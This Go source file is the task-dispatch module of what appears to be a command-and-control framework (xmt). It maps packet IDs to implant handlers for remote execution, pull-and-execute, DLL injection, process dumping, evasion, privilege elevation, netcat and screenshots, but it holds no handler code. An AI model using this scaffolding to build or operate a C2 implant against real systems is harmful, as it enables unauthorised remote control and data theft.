github.com/iDigitalFlame/xmt@v0.5.4/c2/task/task.go (about)

     1  // Copyright (C) 2020 - 2023 iDigitalFlame
     2  //
     3  // This program is free software: you can redistribute it and/or modify
     4  // it under the terms of the GNU General Public License as published by
     5  // the Free Software Foundation, either version 3 of the License, or
     6  // any later version.
     7  //
     8  // This program is distributed in the hope that it will be useful,
     9  // but WITHOUT ANY WARRANTY; without even the implied warranty of
    10  // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    11  // GNU General Public License for more details.
    12  //
    13  // You should have received a copy of the GNU General Public License
    14  // along with this program.  If not, see <https://www.gnu.org/licenses/>.
    15  //
    16  
    17  // Package task is a simple collection of Task based functions that cane be
    18  // tasked to Sessions by the Server.
    19  //
    20  // This package is separate from the c2 package to allow for separation and
    21  // containerization of Tasks.
    22  //
    23  // Basic internal Tasks are still help in the c2 package.
    24  package task
    25  
    26  import (
    27  	"context"
    28  
    29  	"github.com/iDigitalFlame/xmt/com"
    30  	"github.com/iDigitalFlame/xmt/data"
    31  )
    32  
    33  // The Mv* Packet ID values are built-in task values that are handled
    34  // directory before the Mux, as these are critical for operations.
    35  //
    36  // Tv* ID values are standard ID values for Tasks that are handled here.
    37  const (
    38  	MvRefresh    uint8 = 0x07
    39  	MvTime       uint8 = 0x08
    40  	MvPwd        uint8 = 0x09
    41  	MvCwd        uint8 = 0x0A
    42  	MvProxy      uint8 = 0x0B
    43  	MvSpawn      uint8 = 0x0C
    44  	MvMigrate    uint8 = 0x0D
    45  	MvCheckDebug uint8 = 0x0E // MvElevate  uint8 = 0x0E
    46  	MvList       uint8 = 0x0F
    47  	MvMounts     uint8 = 0x10
    48  	MvProcList   uint8 = 0x11 // MvRevSelf uint8 = 0x11
    49  	MvProfile    uint8 = 0x12
    50  	MvWhoami     uint8 = 0x13
    51  	MvScript     uint8 = 0xF0
    52  
    53  	// Built in Task Message ID Values
    54  	TvDownload    uint8 = 0xC0
    55  	TvUpload      uint8 = 0xC1
    56  	TvExecute     uint8 = 0xC2
    57  	TvAssembly    uint8 = 0xC3
    58  	TvZombie      uint8 = 0xC4
    59  	TvDLL         uint8 = 0xC5
    60  	TvCheck       uint8 = 0xC6
    61  	TvPatch       uint8 = 0xC7
    62  	TvPull        uint8 = 0xC8
    63  	TvPullExecute uint8 = 0xC9
    64  	TvRename      uint8 = 0xCA
    65  	TvScreenShot  uint8 = 0xCB
    66  	TvProcDump    uint8 = 0xCC
    67  	TvRevSelf     uint8 = 0xCD // TvProcList    uint8 = 0xCD
    68  	TvRegistry    uint8 = 0xCE
    69  	TvSystemIO    uint8 = 0xCF
    70  	TvEvade       uint8 = 0xD0
    71  	TvTroll       uint8 = 0xD1
    72  	TvUI          uint8 = 0xD2
    73  	TvWindowList  uint8 = 0xD3
    74  	TvLoginUser   uint8 = 0xD4
    75  	TvElevate     uint8 = 0xD5 // TvCheckDebug uint8 = 0xD5
    76  	TvWait        uint8 = 0xD6
    77  	TvUnTrust     uint8 = 0xD7
    78  	TvPower       uint8 = 0xD8
    79  	TvNetcat      uint8 = 0xD9
    80  	TvLogins      uint8 = 0xDA
    81  	TvLoginsAct   uint8 = 0xDB
    82  	TvLoginsProc  uint8 = 0xDC
    83  	TvFuncMap     uint8 = 0xDD
    84  	TvFuncMapList uint8 = 0xDE
    85  )
    86  
    87  // Mappings is a fixed size array that contains the Tasker mappings for each
    88  // ID value.
    89  //
    90  // Values that are less than 22 are ignored. Adding a mapping to here will
    91  // allow it to be executed via the client Scheduler.
    92  var Mappings = [0xFF]Tasker{
    93  	TvDownload:    taskDownload,
    94  	TvUpload:      taskUpload,
    95  	TvExecute:     taskProcess,
    96  	TvAssembly:    taskAssembly,
    97  	TvPull:        taskPull,
    98  	TvPullExecute: taskPullExec,
    99  	TvZombie:      taskZombie,
   100  	TvDLL:         taskInject,
   101  	TvCheck:       taskCheck,
   102  	TvPatch:       taskPatch,
   103  	TvRename:      taskRename,
   104  	TvScreenShot:  taskScreenShot,
   105  	TvProcDump:    taskProcDump,
   106  	TvRevSelf:     taskRevSelf,
   107  	TvRegistry:    taskRegistry,
   108  	TvSystemIO:    taskSystemIo,
   109  	TvEvade:       taskEvade,
   110  	TvTroll:       taskTroll,
   111  	TvUI:          taskInteract,
   112  	TvWindowList:  taskWindowList,
   113  	TvLoginUser:   taskLoginUser,
   114  	TvElevate:     taskElevate,
   115  	TvWait:        taskWait,
   116  	TvUnTrust:     taskUntrust,
   117  	TvPower:       taskShutdown,
   118  	TvNetcat:      taskNetcat,
   119  	TvLogins:      taskLogins,
   120  	TvLoginsAct:   taskLoginsAct,
   121  	TvLoginsProc:  taskLoginsProc,
   122  	TvFuncMap:     taskFuncMap,
   123  	TvFuncMapList: taskFuncMapList,
   124  }
   125  
   126  // Tasklet is an interface that allows for Sessions to be directly tasked
   127  // without creating the underlying Packet.
   128  //
   129  // The 'Packet' function should return a Packet that has the Task data or
   130  // any errors that may have occurred during Packet generation.
   131  //
   132  // This function should be able to be called multiple times.
   133  type Tasklet interface {
   134  	Packet() (*com.Packet, error)
   135  }
   136  
   137  // Tasker is a function alias that will be tasked with executing a Job and
   138  // will return an error or write the results to the supplied Writer.
   139  // Associated data can be read from the supplied Reader.
   140  //
   141  // This function is NOT responsible with writing any error codes, the parent
   142  // caller will handle that.
   143  type Tasker func(context.Context, data.Reader, data.Writer) error